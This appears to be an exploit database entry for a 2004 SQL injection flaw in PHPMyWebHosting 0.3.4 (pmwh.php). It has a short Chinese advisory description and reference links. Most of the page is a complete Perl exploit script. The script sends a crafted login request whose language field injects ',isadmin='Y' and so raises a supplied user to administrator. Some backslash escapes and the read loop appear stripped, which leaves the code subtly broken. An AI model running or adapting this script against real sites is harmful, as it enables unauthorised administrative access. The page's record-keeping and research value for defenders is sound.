https://www.exploit-db.com/exploits/406
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-797

PHPMyWebHosting0.3.4及其更早版本中的pmwh.php存在SQL注入漏洞。远程攻击者可以借助password参数修改SQL语句。

#!/usr/bin/perl
# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password 
combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the 
user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
{
print "You must run the script with the following syntax:n";
print $0." hostname path username passwordn";
exit(0);
}

my $remote = IO::Socket::INET->new (  Proto => "tcp", PeerAddr => $Host, 
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connectedn";

$remote->autoflush(1);

my $http = "POST /$Path/index.php HTTP/1.1
Host: $Host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506 
Firefox/0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content = 
"PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login";

$http .= length($content)."

$content";

print "HTTP: [$http]n";
print $remote $http;
sleep(1);
print "Sentn";

while ()
{
print $_;
}
print "n";

close $remote;


# milw0rm.com [2004-08-20]

来源:XF
名称:phpmywebhosting-pmwh-sql-injection(17005)
链接:http://xforce.iss.net/xforce/xfdb/17005
来源:BID
名称:10942
链接:http://www.securityfocus.com/bid/10942
来源:BUGTRAQ
名称:20040920Re:PosiblesecuritybuginphpMyWebhosting
链接:http://archives.neohapsis.com/archives/bugtraq/2004-09/0247.html
来源:OSVDB
名称:8976
链接:http://www.osvdb.org/8976
来源:BUGTRAQ
名称:20040814PosiblesecuritybuginphpMyWebhosting
链接:http://archives.neohapsis.com/archives/bugtraq/2004-08/0207.html